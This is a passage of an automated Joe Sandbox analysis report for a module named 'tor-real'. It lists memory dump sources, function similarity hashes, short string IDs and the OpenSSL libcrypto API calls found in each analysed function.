                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock$D_read_lockH_retrievememcpy
                                                                            • String ID:
                                                                            • API String ID: 3379989983-3916222277
                                                                            • Opcode ID: 579e5e4b0c9e0ab65a0ca062cbdeb763a37ed98119ef52b61cf023a048a4c7b6
                                                                            • Instruction ID: 7c1f10860a8383c35283738a635916c36bc5635b6de4f4f783b7ca05ec0a3f51
                                                                            • Opcode Fuzzy Hash: 579e5e4b0c9e0ab65a0ca062cbdeb763a37ed98119ef52b61cf023a048a4c7b6
                                                                            • Instruction Fuzzy Hash: E24116746097469FC314EF65C884B9ABBE0FF88348F014A2DE898DB701D771E984CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: X
                                                                            • API String ID: 2581946324-3081909835
                                                                            • Opcode ID: 02d6edc35b82a25661939678f09a02e981e3aeb08149b768732b48a2be39c85b
                                                                            • Instruction ID: a802956baf35c6aad317f3eb87cfde11b5d3e26c824fc94e9eab90fe3b8c2dd3
                                                                            • Opcode Fuzzy Hash: 02d6edc35b82a25661939678f09a02e981e3aeb08149b768732b48a2be39c85b
                                                                            • Instruction Fuzzy Hash: 7441D5B4109B018FC700DFAAD49475EBBE0BF48315F419A2CE9C98BB60D735E884DB85
                                                                            APIs
                                                                            • COMP_expand_block.LIBCRYPTO-1_1 ref: 6C09C9A0
                                                                            • EVP_MD_CTX_md.LIBCRYPTO-1_1 ref: 6C09CFD1
                                                                            • EVP_MD_CTX_md.LIBCRYPTO-1_1 ref: 6C09CFE7
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C09CFEF
                                                                            • CRYPTO_memcmp.LIBCRYPTO-1_1 ref: 6C09D076
                                                                            • EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 6C09D0BE
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C09D0C6
                                                                            • EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 6C09D0EB
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C09D0F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_flagsX_cipherX_md$D_sizeO_memcmpP_expand_block
                                                                            • String ID:
                                                                            • API String ID: 4037436298-0
                                                                            • Opcode ID: ca5091036766ebc107559f7f6bcd6c43288cbf7efbc34d2ab93c980c68d33fe0
                                                                            • Instruction ID: 817ea07c494b77fd0a1adbd35575e0a1bee6241b891aa72d31df64216416c04c
                                                                            • Opcode Fuzzy Hash: ca5091036766ebc107559f7f6bcd6c43288cbf7efbc34d2ab93c980c68d33fe0
                                                                            • Instruction Fuzzy Hash: D6411EB0849305CFDB109F25C08474ABBF0AF88358F519D2EE8A8DBA50E734E985DB16
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$Init
                                                                            • String ID: 0$3$@
                                                                            • API String ID: 2269640188-3913976845
                                                                            • Opcode ID: d8f1f58172e34481e00dfb9a13eb21230bcb6d73196ef5ef666d5bbc559f8aab
                                                                            • Instruction ID: c05ecf6b6b73acde5253891b36fdd79ebe67e77dcd99495a8ce56f4034f8b23b
                                                                            • Opcode Fuzzy Hash: d8f1f58172e34481e00dfb9a13eb21230bcb6d73196ef5ef666d5bbc559f8aab
                                                                            • Instruction Fuzzy Hash: 04B1F375A183418FD320CF29C88074AFBE2BFC9304F15892EE9D897351D775A949CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$P
                                                                            • API String ID: 0-307317852
                                                                            • Opcode ID: 73a34696da3a0000e6ee0b465405c958987030dc219cdf078a6e43bea3103dc6
                                                                            • Instruction ID: f7736c3e1bf1aece8fe40948f3c72d07833785b891add349a343c561af160ec9
                                                                            • Opcode Fuzzy Hash: 73a34696da3a0000e6ee0b465405c958987030dc219cdf078a6e43bea3103dc6
                                                                            • Instruction Fuzzy Hash: 5E9136B1609301CFE700DF29C484B5ABBE0BF45758F169AAEE8949B751D378E944CBC2
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0C2785
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0C27A9
                                                                            • strcmp.MSVCRT ref: 6C0C281F
                                                                            • strlen.MSVCRT ref: 6C0C2960
                                                                              • Part of subcall function 6C0BB6F0: CRYPTO_zalloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,6C0A4C05), ref: 6C0BB731
                                                                              • Part of subcall function 6C0BB6F0: time.MSVCRT ref: 6C0BB762
                                                                              • Part of subcall function 6C0BB6F0: CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,6C0A4C05), ref: 6C0BB76E
                                                                              • Part of subcall function 6C0BB6F0: CRYPTO_new_ex_data.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,6C0A4C05), ref: 6C0BB796
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C2BAF
                                                                              • Part of subcall function 6C0B5600: memcpy.MSVCRT ref: 6C0B5628
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C29EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_cleanse$D_lock_newO_freeO_memdupO_new_ex_dataO_zallocmemcpystrcmpstrlentime
                                                                            • String ID: P
                                                                            • API String ID: 78333025-3110715001
                                                                            • Opcode ID: 668e0b0b51755587e71ae40f50ee34039fc9f6ff0170c50cd68ee7d6f05de278
                                                                            • Instruction ID: 808ccab5b6ac6d6b71e39f194722c5929af6b509d924568692be89de3edada68
                                                                            • Opcode Fuzzy Hash: 668e0b0b51755587e71ae40f50ee34039fc9f6ff0170c50cd68ee7d6f05de278
                                                                            • Instruction Fuzzy Hash: 5D5127B06093018FE710DF25C58839EB7F4BF84748F10992DE9989BB40EB75D948CB92
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A875
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_malloc
                                                                            • String ID: A$E$w
                                                                            • API String ID: 1457121658-3308909727
                                                                            • Opcode ID: 2cf9f226942742d29d1dd62f9ca335448657113652f6006049e097c478c7882a
                                                                            • Instruction ID: b76052f63bb8e163d86df6c29da57a46d3fbae044f2c41c6e39102f7261a6985
                                                                            • Opcode Fuzzy Hash: 2cf9f226942742d29d1dd62f9ca335448657113652f6006049e097c478c7882a
                                                                            • Instruction Fuzzy Hash: D75180B19087018FE7009F14C88478A7BE1BF81758F198A7CDC984F786C77AD885CB91
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094AFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc
                                                                            • String ID: A$b
                                                                            • API String ID: 1208671065-3696090935
                                                                            • Opcode ID: 7d7997718295cb831d1cb203e9ef4899c1c022412919a67fafbbd53975656880
                                                                            • Instruction ID: 7480ef7e8fbe05c6c88a8618d7be5f49ad520194b4df20b31d00aa017d4a454e
                                                                            • Opcode Fuzzy Hash: 7d7997718295cb831d1cb203e9ef4899c1c022412919a67fafbbd53975656880
                                                                            • Instruction Fuzzy Hash: 324187716043018FDB048F69D48034ABBE2EFC5714F25C669E8688F759D7B6E845CB91
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_freeO_mallocstrcpystrlen
                                                                            • String ID: A$P
                                                                            • API String ID: 2028745794-345673399
                                                                            • Opcode ID: 3fbfeff71c66f79f9b7922306804962f8047ea345618f220c4e8809975c6f50f
                                                                            • Instruction ID: 7d68c9b2ea8bb7cd7ba07a66c8b8997e9c21d4b5bfcf978d0e2fb1f87545f574
                                                                            • Opcode Fuzzy Hash: 3fbfeff71c66f79f9b7922306804962f8047ea345618f220c4e8809975c6f50f
                                                                            • Instruction Fuzzy Hash: 994107B56083558FC710DF64C48479AFBF0FF88308F15891EE998AB711E379E9498B52
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4C7B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4C83
                                                                              • Part of subcall function 6C0D4770: BIO_ctrl.LIBCRYPTO-1_1(?,?,?,6C0D5264), ref: 6C0D47C6
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0D4CB0
                                                                            • EVP_PKEY_size.LIBCRYPTO-1_1 ref: 6C0D4D10
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0D4D2C
                                                                            • EVP_DigestSignInit.LIBCRYPTO-1_1 ref: 6C0D4D5C
                                                                            • EVP_DigestSign.LIBCRYPTO-1_1 ref: 6C0D4DA9
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4E3B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4E43
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: DigestO_freeSignX_free$InitO_ctrlO_mallocX_newY_size
                                                                            • String ID:
                                                                            • API String ID: 1209551746-0
                                                                            • Opcode ID: 93d251d75d90fed00acf70b3d85f7d3bc17d2a00adb2049aaafe1b81b8665790
                                                                            • Instruction ID: 952b81d2de954fe4efb467bd6aa0f5330ea992fb720c7f455306072fa8413d8e
                                                                            • Opcode Fuzzy Hash: 93d251d75d90fed00acf70b3d85f7d3bc17d2a00adb2049aaafe1b81b8665790
                                                                            • Instruction Fuzzy Hash: AE41C0B0609301AFD300DF65C08076EBBF4BF89748F528A2EE4999B750E775E945CB82
                                                                            APIs
                                                                            • ASN1_item_d2i.LIBCRYPTO-1_1 ref: 6C0DECC1
                                                                            • ASN1_TYPE_get.LIBCRYPTO-1_1 ref: 6C0DECDD
                                                                            • EVP_PKEY_decrypt.LIBCRYPTO-1_1 ref: 6C0DED32
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0DED8E
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0DEDA1
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0DEDB1
                                                                            • EVP_PKEY_new.LIBCRYPTO-1_1 ref: 6C0DEE16
                                                                            • EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0DEE34
                                                                            • EVP_PKEY_get0_DH.LIBCRYPTO-1_1 ref: 6C0DEE44
                                                                            • BN_bin2bn.LIBCRYPTO-1_1 ref: 6C0DEE60
                                                                            • DH_set0_key.LIBCRYPTO-1_1 ref: 6C0DEE8A
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DEEC3
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0DEEF6
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DEF7F
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DF336
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DF34B
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0DF5E7
                                                                            • BN_free.LIBCRYPTO-1_1 ref: 6C0DF88A
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DF892
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0DF8B6
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_CTX_new.LIBCRYPTO-1_1 ref: 6C0A3C02
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0A3C0C
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_derive_set_peer.LIBCRYPTO-1_1 ref: 6C0A3C20
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_derive.LIBCRYPTO-1_1 ref: 6C0A3C40
                                                                              • Part of subcall function 6C0A3BC0: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0A3C64
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_derive.LIBCRYPTO-1_1 ref: 6C0A3C7E
                                                                              • Part of subcall function 6C0A3BC0: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3D7F
                                                                              • Part of subcall function 6C0A3BC0: EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0A3D87
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0DF961
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Y_free$O_clear_freeX_freeY_derive$E_getH_set0_keyN1_item_d2iN1_item_freeN_bin2bnN_freeO_freeO_mallocR_clear_errorX_ctrlX_newY_copy_parametersY_decryptY_derive_initY_derive_set_peerY_get0_Y_new
                                                                            • String ID:
                                                                            • API String ID: 2627696537-0
                                                                            • Opcode ID: b2dabd2655d79c8983e766d9ed17972c70ed086fdea29c2b6d8e4e7bc54f4bdd
                                                                            • Instruction ID: db81e9fb10ffed3093eef00b7146aab0e31f9940781d9d43cb3b695f9a6d5dc4
                                                                            • Opcode Fuzzy Hash: b2dabd2655d79c8983e766d9ed17972c70ed086fdea29c2b6d8e4e7bc54f4bdd
                                                                            • Instruction Fuzzy Hash: FA31F271A087459FD700DF25C4847AAFBE5BF88308F56C92DE8A89B750E734E4458B46
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,6C0E2AB4), ref: 6C0E291B
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,6C0E2AB4), ref: 6C0E2980
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0E2AB4), ref: 6C0E29E9
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0E2AB4), ref: 6C0E2A1F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$O_freeO_malloc
                                                                            • String ID: A
                                                                            • API String ID: 3400298158-3554254475
                                                                            • Opcode ID: d5769273611cdccc889799cf8b3e7d3bc85586aa2a5963d324b1f9e8aa859f9f
                                                                            • Instruction ID: 083743a486e8be833a4ea4c9d9b39c29fa729030f32274beaca08ec29ac16b53
                                                                            • Opcode Fuzzy Hash: d5769273611cdccc889799cf8b3e7d3bc85586aa2a5963d324b1f9e8aa859f9f
                                                                            • Instruction Fuzzy Hash: 633169B26483119FD310AF65D88539EBBE0FF89358F00D82DE5988BB20D7B694458B42
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_mallocmemcpy
                                                                            • String ID: A$F$I$P
                                                                            • API String ID: 1834057931-352807779
                                                                            • Opcode ID: 760d75d0354e6aa1044f38a171c46653e6e7cf9417a701cc1501e3f5d2ddb01f
                                                                            • Instruction ID: ecd857cba42c7e0b34874559bc34568bfa5c517d16abe06e7e41cac91d7979e6
                                                                            • Opcode Fuzzy Hash: 760d75d0354e6aa1044f38a171c46653e6e7cf9417a701cc1501e3f5d2ddb01f
                                                                            • Instruction Fuzzy Hash: F1318DB4A042058FD708CF1AD184946FBE5FF88314F25C6AAED488B316D731E885CBA6
                                                                            APIs
                                                                            • OPENSSL_init_crypto.LIBCRYPTO-1_1 ref: 6C0ACB14
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACB37
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBA6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_onceL_init_cryptoR_put_error
                                                                            • String ID: F
                                                                            • API String ID: 1977717042-1304234792
                                                                            • Opcode ID: 6a15361164aceb4267dc52fa8c9f4ed783292eabc4fb75a8d1a8081fd3eb3ccf
                                                                            • Instruction ID: 82ff82a7d7f6bba0e9070d85c496465a8375100020805e5de12e303711527294
                                                                            • Opcode Fuzzy Hash: 6a15361164aceb4267dc52fa8c9f4ed783292eabc4fb75a8d1a8081fd3eb3ccf
                                                                            • Instruction Fuzzy Hash: 362151B07193058FD700AFE5C58170B77F4AB8A788F05851DE9948BB52E733D4469F82
                                                                            APIs
                                                                            • BN_num_bits.LIBCRYPTO-1_1 ref: 6C0CC939
                                                                              • Part of subcall function 6C094670: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0946A1
                                                                            • BN_bn2bin.LIBCRYPTO-1_1 ref: 6C0CC97F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CC9A3
                                                                            • CRYPTO_strdup.LIBCRYPTO-1_1 ref: 6C0CC9C7
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_bn2binN_num_bitsO_freeO_strdupO_zallocR_put_error
                                                                            • String ID: A$P
                                                                            • API String ID: 2241039121-345673399
                                                                            • Opcode ID: 028d1fc4d1253df5c8480a91c0fe401b3be5030463156b998bb4a6d98eee3ee8
                                                                            • Instruction ID: 5bb07f94f5ef1c1c3bbdc39573e29e5adf4b60623ac395a4ebe9c9277a8ebb50
                                                                            • Opcode Fuzzy Hash: 028d1fc4d1253df5c8480a91c0fe401b3be5030463156b998bb4a6d98eee3ee8
                                                                            • Instruction Fuzzy Hash: 2321E2B06493459FD710DF64C584B9EBBE0FF88348F008A2CE8898B751D374E549CB86
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
